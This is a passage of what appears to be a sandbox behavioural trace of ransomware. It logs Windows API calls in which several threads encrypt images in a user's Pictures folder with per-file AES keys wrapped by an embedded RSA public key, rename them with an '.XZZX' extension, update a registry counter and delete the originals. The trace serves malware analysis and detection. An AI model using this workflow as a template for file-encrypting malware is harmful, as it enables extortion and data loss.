f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0121.302] OutputDebugStringW (lpOutputString="end") [0121.302] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x08\x86Ê\x03`ÕI\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x449dbf4, pcbBinary=0x449d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x449dbf4, pcbBinary=0x449d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0121.303] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x449dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x449d3dc, pcbStructInfo=0x449d3d8 | out: pvStructInfo=0x449d3dc, pcbStructInfo=0x449d3d8) returned 1 [0121.303] CryptAcquireContextW (in: phProv=0x449d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x449d3e4*=0x3cc77e0) returned 1 [0121.303] CryptImportPublicKeyInfo (in: hCryptProv=0x3cc77e0, dwCertEncodingType=0x1, pInfo=0x3cb19d8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cb1a08*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cb1a10*, PublicKey.cUnusedBits=0x0), phKey=0x449d3ec | out: phKey=0x449d3ec*=0x3a5650) returned 1 [0121.303] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0121.304] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0121.304] CryptEncrypt (in: hKey=0x3a5650, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x449d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x449d3f0*=0x80) returned 1 [0121.304] CryptEncrypt (in: hKey=0x3a5650, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cc7868*, pdwDataLen=0x449d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cc7868*, pdwDataLen=0x449d3e8*=0x80) returned 1 [0121.304] WriteFile (in: hFile=0x5b8, lpBuffer=0x3cc7868*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x449e438, lpOverlapped=0x0 | out: lpBuffer=0x3cc7868*, lpNumberOfBytesWritten=0x449e438*=0x80, lpOverlapped=0x0) returned 1 [0121.304] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0121.304] WriteFile (in: hFile=0x5b8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x449e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x449e438*=0x5, lpOverlapped=0x0) returned 1 [0121.304] GetUserNameW (in: lpBuffer=0x449e1f8, pcbBuffer=0x449dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x449dfe0) returned 1 [0121.305] wsprintfW (in: param_1=0x449dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0121.305] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x449dfe4 | out: phkResult=0x449dfe4*=0x5bc) returned 0x0 [0121.305] RegQueryValueExW (in: hKey=0x5bc, lpValueName="E1010314", lpReserved=0x0, lpType=0x449dfd8, lpData=0x449dfec, lpcbData=0x449dfdc*=0x4 | out: lpType=0x449dfd8*=0x4, lpData=0x449dfec*=0x80, lpcbData=0x449dfdc*=0x4) returned 0x0 [0121.305] RegCloseKey (hKey=0x5bc) returned 0x0 [0121.305] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x449dfe8 | out: phkResult=0x449dfe8*=0x5bc) returned 0x0 [0121.305] RegSetValueExW (in: hKey=0x5bc, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x449dfec*=0x81, cbData=0x4 | out: lpData=0x449dfec*=0x81) returned 0x0 [0121.305] RegCloseKey (hKey=0x5bc) returned 0x0 [0121.305] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.305] VirtualFree (lpAddress=0x40a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.306] CloseHandle (hObject=0x5b8) returned 1 [0121.307] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0121.307] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0121.307] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2b2gQ2C3WuJEBl.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2b2gq2c3wujebl.png")) returned 1 [0121.344] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2b2gQ2C3WuJEBl.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2b2gq2c3wujebl.png")) returned 0 Thread: id = 393 os_tid = 0x934 [0121.126] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0121.126] lstrcpyW (in: lpString1=0x420f460, lpString2="5X6u252V SzZ.gif" | out: lpString1="5X6u252V SzZ.gif") returned="5X6u252V SzZ.gif" [0121.126] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0121.126] SetErrorMode (uMode=0x1) returned 0x1 [0121.126] lstrcpyW (in: lpString1=0x420f860, lpString2="5X6u252V SzZ.gif" | out: lpString1="5X6u252V SzZ.gif") returned="5X6u252V SzZ.gif" [0121.126] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x8d4383d0, Data2=0x9d0e, Data3=0x4cc8, Data4=([0]=0x95, [1]=0xe8, [2]=0x6f, [3]=0xb8, [4]=0x67, [5]=0x9b, [6]=0x2a, [7]=0x30))) returned 0x0 [0121.126] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\5X6u252V SzZ.gif") returned 59 [0121.126] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0121.126] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2187C5602F1ADAF08D4383D0333BBF38.XZZX") returned 80 [0121.126] StrStrW (lpFirst="5X6u252V SzZ.gif", lpSrch="XZZX") returned 0x0 [0121.126] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\5X6u252V SzZ.gif", dwFileAttributes=0x20) returned 1 [0121.174] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\5X6u252V SzZ.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\5x6u252v szz.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5a8 [0121.174] ReadFile (in: hFile=0x5a8, lpBuffer=0x3cf1358, nNumberOfBytesToRead=0x18aa4, lpNumberOfBytesRead=0x420e418, lpOverlapped=0x0 | out: lpBuffer=0x3cf1358*, lpNumberOfBytesRead=0x420e418*=0x18aa4, lpOverlapped=0x0) returned 1 [0121.175] CloseHandle (hObject=0x5a8) returned 1 [0121.175] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x40f0000 [0121.176] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x4210000 [0121.176] SetErrorMode (uMode=0x1) returned 0x1 [0121.176] lstrcpyW (in: lpString1=0x420e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0121.176] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cc7648) returned 1 [0121.178] CryptGenKey (in: hProv=0x3cc7648, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3a5ed0) returned 1 [0121.403] CryptExportKey (in: hKey=0x3a5ed0, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x420e41c | out: pbData=0x0*, pdwDataLen=0x420e41c*=0x94) returned 1 [0121.403] CryptExportKey (in: hKey=0x3a5ed0, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x4210000, pdwDataLen=0x420e41c | out: pbData=0x4210000*, pdwDataLen=0x420e41c*=0x94) returned 1 [0121.403] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0121.404] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0121.404] CryptDestroyKey (hKey=0x3a5ed0) returned 1 [0121.404] CryptReleaseContext (hProv=0x3cc7648, dwFlags=0x0) returned 0 [0121.405] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2187C5602F1ADAF08D4383D0333BBF38.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2187c5602f1adaf08d4383d0333bbf38.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5a4 [0121.405] WriteFile (in: hFile=0x5a4, lpBuffer=0x3cf1358*, nNumberOfBytesToWrite=0x18aa4, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3cf1358*, lpNumberOfBytesWritten=0x420e438*=0x18aa4, lpOverlapped=0x0) returned 1 [0121.407] SetFilePointer (in: hFile=0x5a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x18aa4 [0121.407] WriteFile (in: hFile=0x5a4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0121.407] SetFilePointer (in: hFile=0x5a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x18aa9 [0121.407] WriteFile (in: hFile=0x5a4, lpBuffer=0x420f860*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x420f860*, lpNumberOfBytesWritten=0x420e438*=0x20, lpOverlapped=0x0) returned 1 [0121.407] SetFilePointer (in: hFile=0x5a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x18ac9 [0121.407] WriteFile (in: hFile=0x5a4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0121.407] SetFilePointer (in: hFile=0x5a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x18ace [0121.407] SetErrorMode (uMode=0x1) returned 0x1 [0121.407] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0121.407] OutputDebugStringW (lpOutputString="end") [0121.408] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v0\x88Ê\x03`Õ \x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0121.408] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x420dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8 | out: pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8) returned 1 [0121.408] CryptAcquireContextW (in: phProv=0x420d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x420d3e4*=0x3cc78f0) returned 1 [0121.408] CryptImportPublicKeyInfo (in: hCryptProv=0x3cc78f0, dwCertEncodingType=0x1, pInfo=0x3cb0e78*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cb0ea8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cb0eb0*, PublicKey.cUnusedBits=0x0), phKey=0x420d3ec | out: phKey=0x420d3ec*=0x3a5ed0) returned 1 [0121.408] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0121.409] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0121.409] CryptEncrypt (in: hKey=0x3a5ed0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x420d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x420d3f0*=0x80) returned 1 [0121.409] CryptEncrypt (in: hKey=0x3a5ed0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3ce16d0*, pdwDataLen=0x420d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3ce16d0*, pdwDataLen=0x420d3e8*=0x80) returned 1 [0121.409] WriteFile (in: hFile=0x5a4, lpBuffer=0x3ce16d0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3ce16d0*, lpNumberOfBytesWritten=0x420e438*=0x80, lpOverlapped=0x0) returned 1 [0121.409] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0121.409] WriteFile (in: hFile=0x5a4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0121.409] GetUserNameW (in: lpBuffer=0x420e1f8, pcbBuffer=0x420dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x420dfe0) returned 1 [0121.410] wsprintfW (in: param_1=0x420dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0121.410] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe4 | out: phkResult=0x420dfe4*=0x5b0) returned 0x0 [0121.410] RegQueryValueExW (in: hKey=0x5b0, lpValueName="E1010314", lpReserved=0x0, lpType=0x420dfd8, lpData=0x420dfec, lpcbData=0x420dfdc*=0x4 | out: lpType=0x420dfd8*=0x4, lpData=0x420dfec*=0x81, lpcbData=0x420dfdc*=0x4) returned 0x0 [0121.410] RegCloseKey (hKey=0x5b0) returned 0x0 [0121.410] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe8 | out: phkResult=0x420dfe8*=0x5b0) returned 0x0 [0121.410] RegSetValueExW (in: hKey=0x5b0, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x420dfec*=0x82, cbData=0x4 | out: lpData=0x420dfec*=0x82) returned 0x0 [0121.410] RegCloseKey (hKey=0x5b0) returned 0x0 [0121.410] VirtualFree (lpAddress=0x40f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.411] VirtualFree (lpAddress=0x4210000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.411] CloseHandle (hObject=0x5a4) returned 1 [0121.412] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0121.413] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0121.413] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\5X6u252V SzZ.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\5x6u252v szz.gif")) returned 1 [0121.414] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\5X6u252V SzZ.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\5x6u252v szz.gif")) returned 0 Thread: id = 394 os_tid = 0x938 [0121.342] lstrcpyA (in: lpString1=0x435fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0121.342] lstrcpyW (in: lpString1=0x435f460, lpString2="9s0pX7t.png" | out: lpString1="9s0pX7t.png") returned="9s0pX7t.png" [0121.342] lstrcpyW (in: lpString1=0x435e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0121.342] SetErrorMode (uMode=0x1) returned 0x1 [0121.342] lstrcpyW (in: lpString1=0x435f860, lpString2="9s0pX7t.png" | out: lpString1="9s0pX7t.png") returned="9s0pX7t.png" [0121.343] CoCreateGuid (in: pguid=0x435e440 | out: pguid=0x435e440*(Data1=0x95e76187, Data2=0xb30b, Data3=0x43fd, Data4=([0]=0x8d, [1]=0xb8, [2]=0xb4, [3]=0xea, [4]=0xf5, [5]=0x79, [6]=0x3d, [7]=0xce))) returned 0x0 [0121.343] wsprintfW (in: param_1=0x435ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\9s0pX7t.png") returned 54 [0121.343] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x435fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0121.343] wsprintfW (in: param_1=0x435e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\3A2295CD2F8CD2DF95E7618733C2B727.XZZX") returned 80 [0121.343] StrStrW (lpFirst="9s0pX7t.png", lpSrch="XZZX") returned 0x0 [0121.343] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\9s0pX7t.png", dwFileAttributes=0x20) returned 1 [0121.415] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\9s0pX7t.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\9s0px7t.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5ac [0121.415] ReadFile (in: hFile=0x5ac, lpBuffer=0x3cf1358, nNumberOfBytesToRead=0x121df, lpNumberOfBytesRead=0x435e418, lpOverlapped=0x0 | out: lpBuffer=0x3cf1358*, lpNumberOfBytesRead=0x435e418*=0x121df, lpOverlapped=0x0) returned 1 [0121.416] CloseHandle (hObject=0x5ac) returned 1 [0121.416] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0121.417] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40a0000 [0121.417] SetErrorMode (uMode=0x1) returned 0x1 [0121.417] lstrcpyW (in: lpString1=0x435e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0121.417] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3ce1758) returned 1 [0121.420] CryptGenKey (in: hProv=0x3ce1758, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3a5e90) returned 1 [0121.533] CryptExportKey (in: hKey=0x3a5e90, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x435e41c | out: pbData=0x0*, pdwDataLen=0x435e41c*=0x94) returned 1 [0121.534] CryptExportKey (in: hKey=0x3a5e90, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40a0000, pdwDataLen=0x435e41c | out: pbData=0x40a0000*, pdwDataLen=0x435e41c*=0x94) returned 1 [0121.534] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0121.534] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0121.534] CryptDestroyKey (hKey=0x3a5e90) returned 1 [0121.534] CryptReleaseContext (hProv=0x3ce1758, dwFlags=0x0) returned 1 [0121.534] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\3A2295CD2F8CD2DF95E7618733C2B727.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\3a2295cd2f8cd2df95e7618733c2b727.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5b0 [0121.535] WriteFile (in: hFile=0x5b0, lpBuffer=0x3cf1358*, nNumberOfBytesToWrite=0x121df, lpNumberOfBytesWritten=0x435e438, lpOverlapped=0x0 | out: lpBuffer=0x3cf1358*, lpNumberOfBytesWritten=0x435e438*=0x121df, lpOverlapped=0x0) returned 1 [0121.536] SetFilePointer (in: hFile=0x5b0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x121df [0121.536] WriteFile (in: hFile=0x5b0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x435e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x435e438*=0x5, lpOverlapped=0x0) returned 1 [0121.536] SetFilePointer (in: hFile=0x5b0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x121e4 [0121.536] WriteFile (in: hFile=0x5b0, lpBuffer=0x435f860*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x435e438, lpOverlapped=0x0 | out: lpBuffer=0x435f860*, lpNumberOfBytesWritten=0x435e438*=0x16, lpOverlapped=0x0) returned 1 [0121.536] SetFilePointer (in: hFile=0x5b0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x121fa [0121.536] WriteFile (in: hFile=0x5b0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x435e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x435e438*=0x5, lpOverlapped=0x0) returned 1 [0121.536] SetFilePointer (in: hFile=0x5b0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x121ff [0121.536] SetErrorMode (uMode=0x1) returned 0x1 [0121.536] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC 